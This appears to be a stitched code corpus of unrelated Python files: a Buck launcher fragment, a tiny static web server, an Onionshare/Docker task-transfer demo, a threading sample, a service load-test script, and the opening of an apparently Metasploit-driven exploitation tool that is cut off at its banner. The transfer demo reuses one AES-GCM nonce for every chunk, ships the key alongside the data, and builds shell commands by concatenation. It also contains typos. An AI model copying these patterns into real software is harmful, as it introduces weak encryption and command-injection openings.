exception = None
try:
setup_logging()
exit_code = main(sys.argv, reporter)
except ExecuteTarget as e:
# this is raised once 'buck run' has the binary
# it can get here only if exit_code of corresponding buck build is 0
fn_exec = e.execve
except NoBuckConfigFoundException:
exc_type, exception, exc_traceback = sys.exc_info()
# buck is started outside project root
exit_code = ExitCode.COMMANDLINE_ERROR
except BuckDaemonErrorException:
reporter.status_message = "Buck daemon disconnected unexpectedly"
_, exception, _ = sys.exc_info()
print(str(exception))
exception = None
exit_code = ExitCode.FATAL_GENERIC
except IOError as e:
exc_type, exception, exc_traceback = sys.exc_info()
if e.errno == errno.ENOSPC:
exit_code = ExitCode.FATAL_DISK_FULL
elif e.errno == errno.EPIPE:
exit_code = ExitCode.SIGNAL_PIPE
else:
exit_code = ExitCode.FATAL_IO
except KeyboardInterrupt:
reporter.status_message = "Python wrapper keyboard interrupt"
exit_code = ExitCode.SIGNAL_INTERRUPT
except Exception:
exc_type, exception, exc_traceback = sys.exc_info()
exit_code = ExitCode.FATAL_BOOTSTRAP
if exception is not None:
logging.error(exception, exc_info=(exc_type, exception, exc_traceback))
if reporter.status_message is None:
reporter.status_message = str(exception)
# report result of Buck call
try:
reporter.report(exit_code)
except Exception as e:
logging.debug(
"Exception occurred while reporting build results. This error is "
"benign and doesn't affect the actual build.",
exc_info=True,
)
# execute 'buck run' target
if fn_exec is not None:
fn_exec()
propagate_failure(exit_code)
|
lite_http.py
|
import socket, threading, os
"""
A simple lite static web server based Python with **less 200 line**
"""
log = print
STATIC_DIR = 'static'
PAGE_404 = '404.html'
PAGE_METHOD_NOT_SUPPORT = 'method_not_support.html'
REQUEST_MAX_LENGTH = 1024 * 1024
HEADER_CONTENT_TYPE = ('Content-Type', 'text/html; charset=UTF-8')
RESPONSE_FIRST_VERSION = 'HTTP-Version: HTTP/1.0'
static_list = []
class Request():
def __init__(self, orign_request, addr):
self.path = None
self.method = None
self.signature = None
self.headers = dict()
self.body = None
self.orignal_request = orign_request
self.host, self.port = addr
self.__parse_request__(orign_request)
def __parse_request__(self, request):
twopart = [x for x in request.split('\r\n\r\n') if x]
self.__parse_headers_and_signature__(twopart[0])
if len(twopart) == 2:
# request have body
self.body = twopart[1]
def __parse_headers_and_signature__(self, headers_part):
lines = headers_part.split("\r\n")
self.signature = lines[0]
# headers of request
for header in range(1, len(lines)):
if lines[header].startswith('Host'):
self.headers['Host'] = lines[header].split(":")[1:]
continue
item = lines[header].split(":", 2)
self.headers[item[0]] = item[1].strip()
# parse like 'GET / HTTP/1.1'
self.method, self.path, *other = self.signature.split(' ')
class Response():
"""
Http Response. Note: The body's type is bytes
"""
def __init__(self, status=200, headers={}, body=None, message='ok'):
self.status = status
self.headers = headers
self.body = body
self.message = message
@classmethod
def ok(cls, body=None):
res = Response(body=body)
res.body = body
if body:
res.headers['Content-Length'] = str(len(body))
return res
@classmethod
def not_found(cls):
return Response(status=404, message='Not Found')
@classmethod
def bad_request(cls):
return Response(status=400, message='Bad Request')
def source_view(self):
"""
将Response转换为Source模式, Type is Bytes
"""
header_of_response = str()
signature = ' '.join([RESPONSE_FIRST_VERSION, str(self.status), self.message])
headers_str = str()
for title, content in self.headers.items():
headers_str += ': '.join([title, content])
headers_str += '\r\n'
headers_str = headers_str[:-2] # 去除最后多的一个 '\r\n'
body = self.body
header_of_response += '\r\n'.join([signature, headers_str])
response = bytes(header_of_response + '\r\n\r\n', encoding='utf-8')
if body:
response += body
return response
def file(page) -> bytes:
"""
Open file and return it's content(type:bytes)
"""
with open(os.path.join(STATIC_DIR, page), 'rb') as file:
body = file.read()
return body
def handle_get_request(request) -> Response:
path = request.path
if path == '/':
return Response.ok(body=file('index.html'))
global static_list
if not static_list:
static_list = os.listdir(STATIC_DIR)
if path[1:] in static_list:
return Response.ok(body=file(path[1:]))
else:
return Response.ok(body=file(PAGE_404))
def method_not_support(method) -> Response:
try:
body = file(PAGE_METHOD_NOT_SUPPORT)
return Response(405, body=body, message='Method %s Not Allowed' % method)
except FileNotFoundError as e:
return Response.bad_request()
def handle_request(request: Request) -> Response:
if request.method.lower() == 'get':
return handle_get_request(request)
if request.method.lower() == 'options':
return Response().ok()
return method_not_support(request.method.lower())
def after_handle_response(response):
# handle cross request
# 处理跨域请求 可以用于测试
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers[
"Access-Control-Allow-Headers"] = ("Content-Type,Content-Length, "
"Authorization, Accept,X-Requested-With")
response.headers["Access-Control-Allow-Methods"] = "PUT,POST,GET,DELETE,OPTIONS"
def accept_socket(sock: socket, addr):
ori_request = sock.recv(REQUEST_MAX_LENGTH)
# parse original request to the special format for human
request = Request(ori_request.decode('utf-8'), addr)
log("Accept new http request: %s" % request.signature)
log(" original http request:\n", ori_request)
response = handle_request(request)
after_handle_response(response)
response_bytes = response.source_view()
log('Send http response:', response_bytes)
sock.send(response_bytes)
sock.close()
def start(host, port):
"""start web server, it will run forever
"""
global _main
_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_main.bind((host, port))
_main.listen()
while True:
sock, addr = _main.accept()
log('Accept new connection %s:%s' % addr)
threading.Thread(target=accept_socket, args=(sock, addr)).start()
if __name__ == '__main__':
start("0.0.0.0", 8080)
|
executeDemo.py
|
#This is a version of execute.py intended for demo purposes.
#Normally, when running the program there are 3 file transfers:
#1. User task file to provider (1.2GB image.zip)
#2. Provider result file to validator (already ran image)
#3. Provider result file to user
#This version of execute will skip the first two file transfers.
#The last one is left in to demonstrate the file transfer and that the user receives the file.
#Note that the regular user execute.py will work for this goal.
#For this to work, the provider must already have the task file (1.2GB) in their directory,
# and the validator must already have the result file in their directory.
import os
import sys
import requests as r
import time
import json
from signal import signal, SIGINT
import threading
from datetime import datetime
import math
import subprocess
import multiprocessing
from multiprocessing import Manager, Value
from ctypes import c_char_p
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
##globals##
threads = 8
threadL = []
orderAddr = []
order = []
startTimes = []
mainThread = None
manager = Manager()
totalAddr = manager.Value(c_char_p, '')
totalStartTime = Value('d', 0.0)
content = []
for i in range(threads):
content.append(b'')#inits list with threads number of empty byte arrays
mode = '' #user, provider, or validator
fileName = ''
encKey = None
encNonce = None
#######################################################################################################################################
#######################################################encryption######################################################################
#######################################################################################################################################
def genKey():
keyFile = "key.txt"
nonceFile = "nonce.txt"
f = open(keyFile, 'w')
f.close()
f = open(nonceFile, 'w')
f.close()
key = os.urandom(32)
nonce = os.urandom(32)
f = open(keyFile, 'wb')
f.write(key)
f.close()
f = open(nonceFile, 'wb')
f.write(nonce)
f.close()
def getKey(keyFile="", nonceFile=""):
f = open(keyFile, 'rb')
key = f.read()
f.close()
f = open(nonceFile, 'rb')
nonce = f.read()
f.close()
return [key, nonce]
def enc(key=b"", nonce=b"", mess=b""):
alg = algorithms.AES(key)
cipher = Cipher(alg, modes.GCM(nonce), default_backend())
encryptor = cipher.encryptor()
return encryptor.update(mess)
def dec(key=b"", nonce=b"", mess=b""):
alg = algorithms.AES(key)
cipher = Cipher(alg, modes.GCM(nonce), default_backend())
decryptor = cipher.decryptor()
return decryptor.update(mess)
genKey()
#######################################################################################################################################
###########################################################host########################################################################
#######################################################################################################################################
def shareOrder():
global totalStartTime
while os.path.isfile('totalOrder.txt') != True:
time.sleep(5)
totalStartTime.value = time.time()
######zip the total order, key, and nonce to share#########
os.system('zip totalOrder.zip totalOrder.txt key.txt nonce.txt >/dev/null 2>&1')
time.sleep(5)
###########################################################
subprocess.Popen(["script -c \"../../../onionshare/dev_scripts/onionshare --website totalOrder.zip" + "\" -f onionshareOrder.txt"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL,shell=True)
def startShare(file, iter):
#print(file + ":" + str(iter))
#start onionshare server to host file
subprocess.Popen(["script -c \"../../../onionshare/dev_scripts/onionshare --website " + file + "\" -f onionshare" + str(iter) + ".txt"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL,shell=True)
def splitFile(file):
fileName = file
f = open(file,'rb')
content = f.read()
contentLen = len(content)
pos = 0
#print(lines)
for i in range(0, threads):
fw = open(file+str(i)+'.txt' ,'wb')
lo = int((i)*(contentLen/threads))
hi = int((i+1)*(contentLen/threads))
fw.write(content[lo:hi])
fw.close()
order.append(file+str(i)+'.txt\n')
keyFile = open("key.txt", 'rb')
key = keyFile.read()
keyFile.close()
nonceFile = open("nonce.txt", "rb")
nonce = nonceFile.read()
nonceFile.close()
fenc = open(file+str(i)+'.txt', "rb")
hold = enc(key, nonce, fenc.read())
fenc.close()
fenc = open(file + str(i) + ".txt", "w")
fenc.close
fenc = open(file+str(i)+".txt", "wb")
fenc.write(hold)
fenc.close()
f.close()
f = open('order.txt', 'w')
f.writelines(order)
f.close()
def createThreadsHost():
f = open("order.txt" , 'r')
orderFile = f.readlines()
f.close()
j = 0
for i in orderFile:
#t=threading.Thread(target=startShare,args=[i.strip('\n'),j])
t=multiprocessing.Process(target=startShare,args=(i.strip('\n'),j,))
threadL.append(t)
j += 1
def runThreads():
for i in threadL:
i.daemon = True
i.start()
startTimes.append(time.time())
#print(startTimes)
def getAddrs():
#for i in range(0,threads):
#orderAddr.append(0)
t = 0
while t < threads:
global orderAddr
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt'):
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
print(orderAddr)
time.sleep(5)
print(orderAddr)
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
def getTotalAddr():
global totalAddr
flag = True
while(flag):
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
totalAddr.value = j.strip('\n') + "/totalOrder.zip"
flag = False
time.sleep(5)
#Write address to file
f = open('totalOrderAddress.txt', 'w')
f.write(totalAddr.value)
f.close()
def threadRestarter():
#for i in range(0,threads):
#orderAddr.append(0)
global orderAddr
while(True):
#global orderAddr
#print("addrs:"+ str(orderAddr))
try:
for i in range(0,len(startTimes)):
global orderAddr
if time.time() > startTimes[i] + 120 and orderAddr[i] == 0:
os.system('rm onionshare' + str(i) + '.txt')
#threadL[i]._delete()
threadL[i].terminate()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
#t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
t=multiprocessing.Process(target=startShare,args=(lines[i].strip('\n'),i,))
t.daemon = True
threadL[i] = t
threadL[i].start()
holdVal = startTimes[i]
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to time issue. It started at:'+str(holdVal)+' and should end at:'+str(holdVal+120)+' and addr:'+ str(orderAddr[i])+'\n')
f.close()
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt' ):
f = open('onionshare' + str(i) + '.txt' )
lines = f.readlines()
for line in lines:
if line.find('in use') >= 0:
os.system('rm onionshare' + str(i) + '.txt')
#threadL[i]._delete()
threadL[i].terminate()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
#t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
t=multiprocessing.Process(target=startShare,args=(lines[i].strip('\n'),i,))
t.daemon = True
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to address error\n')
f.close()
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt') and orderAddr[i] == 0:
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
if t == threads:
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
except:
pass
#Print a string with each file's percentage
toprint = ""
for i in range(threads):
try: #Will fail if index not found, then just ignore
f = open('onionshare'+str(i)+'.txt', 'r')
#Get string of percentage for file slice
wholetext = f.read()
f.close()
percentindex = wholetext.rindex("%") #Finds the position of the last percent
spaceindex = wholetext.rindex(" ", 0, percentindex) #Finds the position of the last space before the percent
percentage = wholetext[spaceindex+1:percentindex+1] #Skips the space but includes the percent
toprint += str(i) + ": " + percentage + ("" if i == threads-1 else ", ") #Formats string
except: pass
print(toprint + "\r", end="") #recurrent character so it rewrites last line instead of making new lines
time.sleep(5)
def hostReqFail():
subprocess.Popen(["script -c \"~/onionshare/dev_scripts/onionshare --website reqFails.txt" + "\" -f reqFailLog.txt"],stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
def reqFail():
#failThread = threading.Thread(target=hostReqFail)
failThread = multiprocessing.Process(target=hostReqFail)
threadOn = False
global threads
reqMade = [0]*threads
callSum = 0
while True:
time.sleep(120)
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt'):
f = open('onionshare' + str(i) + '.txt')
lines = f.readlines()
f.close()
for line in lines:
if reqMade[i] == 0 and line.find('get') >= 0:
reqMade[i] = 1
callSum += 1
if callSum >= (threads/2) and callSum != threads:
f = open('reqFails.txt', 'w')
for i in range(0,threads):
if reqMade[i] == 0:
f.write(str(i)+'\n')
if threadOn:
#failThread._delete()
failThread.terminate()
#failThread = threading.Thread(target=hostReqFail)
failThread = multiprocessing.Process(target=hostReqFail)
failThread.daemon = True
failThread.start()
threadOn = True
else:
failThread.start()
threadOn = True
if callSum == threads:
#failThread._delete()
failThread.terminate()
threadOn = False
#################################################################################################################
#################################################################################################################
#################################################################################################################
def totalThreadRestarter():
global totalStartTime
global totalAddr
global mainThread
mainThread = multiprocessing.Process(target=shareOrder)
mainThread.daemon = True
mainThread.start()
while (True):
if (totalStartTime.value != 0.0) and time.time() > (totalStartTime.value + 60) and totalAddr.value == '':
os.system('rm onionshareOrder.txt >/dev/null 2>&1')
#restart thread
#mainThread._delete()
mainThread.terminate()
#t = threading.Thread(target=shareOrder)
t = multiprocessing.Process(target=shareOrder)
t.daemon = True
mainThread = t
mainThread.start()
f = open('restart.txt', 'a')
f.write("thread: for totalOrder has been restarted at:" + str(time.time()) + ' due to time issue\n')
f.close()
time.sleep(5)
def resetHost(resetMode):
global threadL
global orderAddr
global order
global startTimes
global totalStartTime
global mode
global fileName
global totalAddr
for i in threadL:
try: #May or may not already be deleted
#i._delete()
i.terminate()
except: pass
threadL = []
orderAddr = []
order = []
startTimes = []
totalStartTime.value = 0.0
if resetMode == True:
mode = ''
totalAddr.value = ''
try:
os.system('rm restart.txt totalOrderAddress.txt totalOrder.txt onionShareOrder.txt onionshare*.txt order.txt image.zip*.txt >/dev/null 2>&1')
except:
pass
fileName = ''
#new memory and command line reset
os.system("reset")
os.system("ps aux > ps.txt")
f = open("ps.txt", 'r')
line = f.readline()
while line != '':
if line.find('onionshare') != -1:
try:
os.system('kill -9' + line.split()[1] + ' >/dev/null 2>&1')
except:
pass
line = f.readline()
f.close()
try:
os.system('rm ps.txt')
except:
pass
def failingCheck():
global threadL
while True:
time.sleep(120)
positions = []
try:
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
fails = session.get(totalAddr.value + '/reqFails.txt')
f = open('reqFails.txt', 'wb').write(fails.contetn)
f.close()
f = open('reqFails.txt', 'r')
lines = f.readlines()
f.close()
for line in lines:
positions.append(int(line).rstrip())
f = open('totalOrder.txt', 'r')
lines = f.readlines()
for pos in positions:
#threadL[pos]._delete()
threadL[pos].terminate()
#threadL[pos] = threading.Thread(target=getShare,args=[lines[pos].rstrip(),pos])
threadL[pos] = multiprocessing.Process(target=getShare,args=(lines[pos].rstrip(),pos,))
threadL[pos].daemon = True
threadL[pos].start()
except:
pass
#######################################################################################################################################
########################################################request########################################################################
#######################################################################################################################################
def getShare(address, iter):
global content
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
#content[iter] = res.content #append this slice's content to total content list
########################get key and nonce##################################
[key, nonce] = getKey("key.txt","nonce.txt")
###########################################################################
f = open("image.zip" + str(iter) + ".txt","wb" )
f.write(dec(key, nonce, res.content))
f.close()
#print(type("-----Received content from thread " + iter))
#for i in range(threads):
# print(len(content[i]))
#This thread unneeded now, can safely kill it
killMe(iter)
def getShareWithoutIter(address):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
#########save the zip and unzip it#########
open("totalOrder.zip", 'wb').write(res.content)
time.sleep(5)
os.system("unzip -o totalOrder.zip")
###########################################
def createThreadsReq():
global totalAddr
global content
global mode
flag = True
flagTwo = True
flagThree = True
#Most things here removed since they're just various steps in waiting for the file to be done transferring
while flag:
time.sleep(5)
#Addresses written to file (Step 2)
# if os.path.isfile("totalOrder.txt") and flagTwo:
# print("Downloading file from host. This may take a while...")
# flagTwo = False
# #Need to make a thread for each address
# f = open("totalOrder.txt", 'r')
# lines = f.readlines()
# f.close()
# j = 0
# for line in lines:
# #t = threading.Thread(target=getShare,args=[line.strip('\n'), j])
# t = multiprocessing.Process(target=getShare,args=(line.strip('\n'), j,))
# threadL.append(t)
# t.start()
# j += 1
# #Every slot in content has been written to (Step 3)
# allVal = True
# for i in range(0,threads):
# if os.path.isfile("image.zip" + str(i) + ".txt"):
# content[i] = True
# else:
# allVal = False
# break
# if allVal:
# if mode == 'user' or mode == 'provider':
# session = r.session()
# session.proxies = {}
# session.proxies['http'] = 'socks5h://localhost:9050'
# session.proxies['https'] = 'socks5h://localhost:9050'
# session.get(totalAddr.value + '/finish') #tell server finished downloading
# totalFile = open('image.zip', 'wb')
# for i in range(0, threads):
# iterFile = open('image.zip' + str(i) + '.txt', 'rb')
# totalFile.write(iterFile.read())
# iterFile.close()
# totalFile.close()
# flag = False
# resetReq()
#totalOrder.txt not yet received (Step 1)
if flagThree:
statF = open("stat.txt", 'r')
totalAddr.value = statF.readline().rstrip()
statF.close()
#if file ready to be received from worker. totalAddr will hold the .onion address
if totalAddr.value != '' and totalAddr.value != 'Executing' and totalAddr.value != 'Ready':
flagThree = False
#getShareWithoutIter(totalAddr) #Still need to get this to get key and nonce
flag = False #This will cause loop to exit and image.zip to start running
#Tell user program to stop
if mode == 'provider':
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
session.get(totalAddr.value + '/finish') #tell server finished downloading
def resetReq():
global content
global threadL
global mode
global mainThread
global totalAddr
content = []
for i in range(threads):
content.append(False)
#content.append(b'')#inits list with threads number of empty byte arrays
#kill all threads before resetting
for i in threadL:
try: #May or may not already be deleted
#i._delete()
i.terminate()
except: pass
threadL = []
mainThread = None
totalAddr.value = ''
mode = ''
try:
os.system('rm totalOrder.txt onionShareOrder.txt image.zip*.txt')
except:
pass
#new memory and command line reset
os.system("reset")
os.system("ps aux > ps.txt")
f = open("ps.txt", 'r')
line = f.readline()
while line != '':
if line.find('onionshare') != -1:
try:
os.system('kill ' + line.split()[1])
except:
pass
line = f.readline()
f.close()
f = open('stat.txt', 'w')
f.close()
try:
os.system('rm ps.txt')
except:
pass
#kill specified thread
def killMe(iter):
#threadL[iter]._delete()
try:
threadL[iter].terminate()
except:
pass
#######################################################################################################################################
#####################################################controller########################################################################
#######################################################################################################################################
def getTime(mess):
now = datetime.now()
end = open('log.txt', 'r').readline().rstrip()[24:]
#print(now.strftime("%a %b %d %Y %H:%M:%S" + end))
time = now.strftime("%a %b %d %Y %H:%M:%S" + end)
f = open('log.txt', 'a')
f.write('\n' + time + " "+ mess)
f.close()
def hostController(file):
global totalAddr
totalAddr.value = '' #Reset totalAddr for total thread restarter
genKey()
for i in range(0,threads):
orderAddr.append(0)
splitFile(file)
createThreadsHost()
runThreads()
errCorr = multiprocessing.Process(target=threadRestarter)
#errCorr.daemon = True #demonic processes can't have children
errCorr.start()
#getAddrs()
#failThread = threading.Thread(target=reqFail)
failThread = multiprocessing.Process(target=reqFail)
failThread.daemon = True
failThread.start()
global mainThread
#Restarter for total share
#errCorrMain = threading.Thread(target=totalThreadRestarter)
errCorrMain = multiprocessing.Process(target=totalThreadRestarter)
#errCorrMain.daemon = True #demonic processes can't have children
errCorrMain.start()
getTotalAddr()
flag = True
while flag:
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
line = f.readline()
while line != '':
if "/finish" in line :
flag = False
try: #May or may not already be deleted
errCorr.terminate()
except: pass
try: #May or may not already be deleted
errCorrMain.terminate()
except: pass
try: #May or may not already be deleted
mainThread.terminate()
except: pass
line = f.readline()
f.close()
try: #May or may not already be deleted
failThread.terminate()
except: pass
resetHost(True)
def reqController():
#failThread = threading.Thread(target=failingCheck)
failThread = multiprocessing.Process(target=failingCheck)
failThread.daemon = True
failThread.start()
createThreadsReq()
try: #May or may not already be deleted
#failThread._delete()
failThread.terminate()
except: pass
def dockerExe():
global mode
#time.sleep(30) #not needed for demo
f = open('stat.txt', 'w')
f.close()
f = open('stat.txt', 'w')
f.write('Executing')
f.close()
#this will load the image back into docker
os.system("unzip image.zip")
os.system("sudo docker load -i image.tgz")
#this will start the container in a bash
os.system("sudo docker run -dit execute:latest bash")
getTime('Docker Image Loaded and Executing')
#this will execute the code
#0 -> Provider
#1 -> Validator
mval = 0
if mode == 'validator':
mval = 1
os.system("sudo docker exec $(sudo docker container ls -q) python3 execute.py " + str(mval) )
#this will delete the old image file
os.system("sudo rm -rf image.tgz")
#this will update the container
os.system("sudo docker commit $(sudo docker container ls -q) execute:latest")
getTime("Execution Finished")
#this will remove the image to be transmitted to the next step
os.system("sudo docker save execute -o image.tgz")
#zip the image
os.system('sudo zip -0 image.zip image.tgz')
#this will stop the docker image
os.system("sudo docker stop $(sudo docker container ls -q)")
getTime('Image Unloaded and Ready For Transmission')
time.sleep(30)
def getMode():
global mode
flag = True
while flag:
time.sleep(5)
if os.path.isfile('mode.txt'):
f = open("mode.txt", "r")
curLine = f.readline().rstrip()
f.close()
if(curLine == "provider" or curLine == 'validator' or curLine == "user"):
mode = curLine
flag = False
f = open('mode.txt', 'w')
f.close()
def submitTask():
f = open('stat.txt', 'w')
f.close()
f = open('stat.txt', 'w')
f.write('Ready')
f.close()
if __name__ == '__main__':
f = open('mode.txt', 'w') #make sure mode is cleared on startup
f.close()
while True:
getMode()
if mode == 'user':
hostController('image.zip')
flag = True
while flag:
f = open('stat.txt', 'r')
line = f.read()
f.close()
if line.find('onionshare') != -1:
flag = False
time.sleep(5)
reqController()
elif mode == 'provider':
resetHost(False)
reqController()
dockerExe()
submitTask()
try:
os.system("rm -rf totalOrder.txt totalOrder.zip")
except:
pass
hostController('image.zip')
elif mode == 'validator':
resetHost(False)
reqController()
dockerExe()
try:
os.system("rm -rf totalOrder.txt totalOrder.zip")
except:
pass
submitTask()
|
multi_threading_class.py
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
class ThreadFunc(object):
def __init__(self, func, args, name=''):
self.name = name
self.func = func
self.args = args
def __call__(self):
apply(self.func, self.args)
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
print("start loop", idx, " at ", time.ctime())
def main():
loops = [4, 2]
threads = []
print("Process start at ", time.ctime())
for ii in range(len(loops)):
t = Thread(
target=ThreadFunc(loop, (ii, loops[ii]), loop.__name__))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
sfn_message_test.py
|
# sfn_message_test.py
"""A script designed to test http request between the sfn_service and SCRAL"""
import json
import requests
from threading import Thread
import time
import argparse
import arrow
import os
import socket
from pathlib import Path
import random
import sys
sys.path.append(str(Path(__file__).absolute().parents[3]))
from WP5.KU.definitions import KU_DIR
import WP5.KU.SharedResources.loader_tools as tools
__version__ = '0.2'
__author__ = 'RoViT (KU)'
print(str(socket.gethostname()))
parser = argparse.ArgumentParser(description='"A simple load testing script to fire messages off to the SFN')
# parser.add_argument('--sfn_url', default='http://MPCLSGESFN01.monica-cloud.eu:5000/', type=str,
parser.add_argument('--sfn_url', default='http://0.0.0.0:5000/', type=str,
help='The URL and port the SFN is currently listening on')
parser.add_argument('--scral_url', default='http://monappdwp3.monica-cloud.eu:8000/', type=str,
help='The URL and port the SFN is currently listening on')
parser.add_argument('--looping', default='False', type=str, help='Loop the message calls indefinitely.')
parser.add_argument('--threaded', default='False', type=str, help='sets up messages as separate threads')
parser.add_argument('--dataset_folder', default='/ocean/robdupre/PYTHON_SCRIPTS/MONICA_repo/WP5/KU/Algorithms/algorithm_output/',
type=str, help='Location of RiF JSON Files to send to SFN.')
def call_sfn(payload, n, module):
# UPDATE URLS AND CHECK LINKSMART
try:
r = requests.put(url + 'message', json=json.dumps(payload))
except requests.exceptions.RequestException as exception:
print('[INFO] Thread {} MODULE {} Failed:{}.'.format(n, module, exception))
else:
print('[INFO] Thread {} MODULE {} OK.'.format(n, module))
_args = parser.parse_args()
if __name__ == '__main__':
url = _args.sfn_url
scral_url = _args.scral_url
print('SFN URL:{}'.format(url))
print('SCRAL URL:{}'.format(scral_url))
num_cameras = 1
algorithm_process_time = 1
dataset_folder = _args.dataset_folder
if _args.looping == 'True':
looping = True
else:
looping = False
if _args.threaded == 'True':
threaded = True
else:
threaded = False
looping = True
sfn_urls = {'scral_url': scral_url}
message_locations = [
[os.path.join(dataset_folder), 'SAMPLE_fight_detection'],
[os.path.join(dataset_folder), 'SAMPLE_crowd_density_local'],
[os.path.join(dataset_folder), 'SAMPLE_flow'],
[os.path.join(dataset_folder), 'SAMPLE_action_recognition'],
[os.path.join(dataset_folder), 'SAMPLE_object_detection'],
]
num_algorithms = len(message_locations)
time_interval = (algorithm_process_time * num_cameras) / (num_algorithms * num_cameras)
# time_interval = 5
print('Messages will be sent every {} seconds'.format(time_interval))
configs = [
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_25'),
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_27'),
tools.load_settings(os.path.join(KU_DIR, 'KUConfigTool/cam_configs/'), 'TIVOLI_31'),
]
# CHECK CONNECTION WITH SFN
try:
resp = requests.get(url)
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# UPDATE URLS
print('CHECKING URL UPDATE SFN')
try:
resp = requests.post(url + 'urls', json=json.dumps(sfn_urls))
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# SEND THE CONFIGS AS IF VCA WERE UPDATING THE SFN
print('CHECKING CONFIG UPDATE SFN')
try:
resp = requests.post(url + 'configs', json=json.dumps(configs))
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
# SWITCH SFN TO DEBUGGING MODE
# print('SWITCH SFN TO DEBUGGING MODE')
# try:
# resp = requests.get(url + 'debug')
# except requests.exceptions.RequestException as e:
# print('WOO THERE, Something went wrong, error:' + str(e))
# else:
# print(resp.text, resp.status_code)
# HELLO SCRAL VIA SFN
print('CHECKING SFN CAN SEE SCRAL')
try:
resp = requests.get(url + 'scral')
except requests.exceptions.RequestException as e:
print('WOO THERE, Something went wrong, error:' + str(e))
else:
print(resp.text, resp.status_code)
if resp.ok:
counter = 0
while True:
cam = random.randint(0, len(configs)-1)
for mess_type in message_locations:
mess = tools.load_json_txt(mess_type[0], mess_type[1])
cam_conf = configs[cam]
mess['camera_ids'][0] = cam_conf['camera_id']
# ADD IF STATEMENTS FOR EACH MODULE TYPE
if mess['type_module'] == 'fighting_detection':
mess['timestamp'] = str(arrow.utcnow())
mess['confidence'] = random.randint(0, 10) / 10
elif mess['type_module'] == 'crowd_density_local':
mess['timestamp1'] = str(arrow.utcnow())
elif mess['type_module'] == 'flow':
mess['timestamp'] = str(arrow.utcnow())
elif mess['type_module'] == 'action_recognition':
mess['timestamp'] = str(arrow.utcnow())
elif mess['type_module'] == 'object_detection':
mess['timestamp'] = str(arrow.utcnow())
if threaded:
t = Thread(target=call_sfn, args=(mess, counter, mess['type_module'],))
t.daemon = True
t.start()
else:
call_sfn(mess, 1, mess['type_module'])
counter = counter + 1
time.sleep(time_interval)
if not looping:
break
|
Executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.Util.util import *
from lib import *
from lib.Metasploit import Metasploit
from lib.parameter_server import Server as ParameterServer
from lib.CreateReport import CreateReport
from Worker import Worker_thread
def show_banner(util, delay_time=2.0):
banner = u"""
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
███╗ ███╗ ██████╗ ███████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
████╗ ████║██╔═══██╗██╔════╝██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
██╔████╔██║██║ ██║█████╗ ██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██║╚██╔╝██║██║ ██║██╔══╝ ██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
